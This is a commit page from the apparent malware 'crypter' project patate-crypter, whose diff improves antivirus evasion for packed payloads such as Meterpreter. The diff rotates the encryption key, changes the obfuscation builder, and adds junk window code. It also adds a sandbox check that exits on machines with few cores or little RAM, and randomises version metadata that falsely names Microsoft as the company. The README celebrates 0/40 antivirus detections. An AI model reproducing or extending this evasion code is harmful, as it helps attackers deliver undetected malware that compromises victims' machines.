patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix: now at 0/40 detections back again

Browse Source
This commit is contained in:
ALittlePatate
2024-03-19 09:02:32 +01:00
parent 1d74de9a6e
commit 4d6b376c03
5 changed files with 30 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
Builder/obfuscation.py
View File

@@ -198,7 +198,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
if "/*" in line : in_comment = True if "/*" in line : in_comment = True
elif "*/" in line : in_comment = False elif "*/" in line : in_comment = False
if "switch" in line : in_switch = True if "switch" in line : in_switch = True
elif in_switch and "}" in line : in_switch = False elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
if "__asm" in line : in_asm = True if "__asm" in line : in_asm = True
elif in_asm and "}" in line : in_asm = False elif in_asm and "}" in line : in_asm = False
if "// Your code here" in line : if "// Your code here" in line :

2
Crypter/config.h
View File

@@ -1,2 +1,2 @@
#pragma once #pragma once
#define KEY "ouhuoqhzdb" #define KEY "mkhjqsdhfjbzqfcqzf"

26
Crypter/main.cpp
View File

@@ -207,6 +207,24 @@ void allo() {
//END //END
} }
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
//START
switch (uMsg) {
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case WM_PAINT: {
PAINTSTRUCT ps;
HDC hdc = BeginPaint(hwnd, &ps);
FillRect(hdc, &ps.rcPaint, (HBRUSH) (COLOR_WINDOW + 1));
EndPaint(hwnd, &ps);
return 0;
} default:
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
//END
}
#ifdef _DEBUG #ifdef _DEBUG
int main(void) int main(void)
#else #else
@@ -220,20 +238,20 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm
DEBUG_PRINTF("[+] Started\n"); DEBUG_PRINTF("[+] Started\n");
MEMORYSTATUSEX memoryStatus; MEMORYSTATUSEX memoryStatus = { 0 };
memoryStatus.dwLength = sizeof(memoryStatus); memoryStatus.dwLength = sizeof(memoryStatus);
GlobalMemoryStatusEx(&memoryStatus); GlobalMemoryStatusEx(&memoryStatus);
ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys; ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys;
// Convert total physical memory to gigabytes
double totalPhysicalMemoryGB = static_cast<double>(totalPhysicalMemory) / (1024 * 1024 * 1024); double totalPhysicalMemoryGB = static_cast<double>(totalPhysicalMemory) / (1024 * 1024 * 1024);
// Get the number of processor cores
SYSTEM_INFO systemInfo; SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo); GetSystemInfo(&systemInfo);
DWORD numProcessorCores = systemInfo.dwNumberOfProcessors; DWORD numProcessorCores = systemInfo.dwNumberOfProcessors;
if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) {
MessageBoxA(NULL, "uwu", "failed", 0);
return 0; return 0;
}
const int bufferSize = sizeof(sample) / sizeof(sample[0]); const int bufferSize = sizeof(sample) / sizeof(sample[0]);

8
Crypter/patate-crypter.rc
View File

@@ -68,12 +68,12 @@ BEGIN
BLOCK "040c04b0" BLOCK "040c04b0"
BEGIN BEGIN
VALUE "CompanyName", "Microsoft" VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "qgfozummtzttkchjglkz" VALUE "FileDescription", "clgdknugqsthezarlwbq"
VALUE "FileVersion", "1.0.0.1" VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "oiablyy.exe" VALUE "InternalName", "yhoqres.exe"
VALUE "LegalCopyright", "Copyright (C) 2023" VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "tmzponf.exe" VALUE "OriginalFilename", "erbggay.exe"
VALUE "ProductName", "oeozjqg.exe" VALUE "ProductName", "awwmoqx.exe"
VALUE "ProductVersion", "1.0.0.1" VALUE "ProductVersion", "1.0.0.1"
END END
END END

6
README.md
View File

@@ -5,15 +5,13 @@ I will not provide any support for running the program, it is only made for peop
# Limitations # Limitations
patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br> patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br>
The crypter will link the library dynamically by default because statically linking the MSVC default librairies cuases the detections to go from 0/40 to 5/40 (see below).<br>
There is an issue where the reallocations would fail for specific payloads, TOFIX.<br> There is an issue where the reallocations would fail for specific payloads, TOFIX.<br>
There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)). There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).
# Detection rate # Detection rate
There is currently 0/40 detections for a crypted meterperter : There is currently 0/40 detections for a crypted meterperter :
- [original](https://kleenscan.com/scan_result/c6ee0a65f7b88ff709b003357ba9e21a2c1488ad7c6f2314d00bdae45d542df8) - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
- [crypted (dynamically linked)](https://kleenscan.com/scan_result/be8a5e779c0269d2a87d9345118e180162852c4ed70e18f17838da8f879e87ae) - [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
- [crypted (statically linked)](https://kleenscan.com/scan_result/0b65052a51ce5d3f7807fdae4c7ffc1c45f2868ab41f9073c3bd479b2c86b2a8)
# How does it work ? # How does it work ?
The crypter (compile time) works by : The crypter (compile time) works by :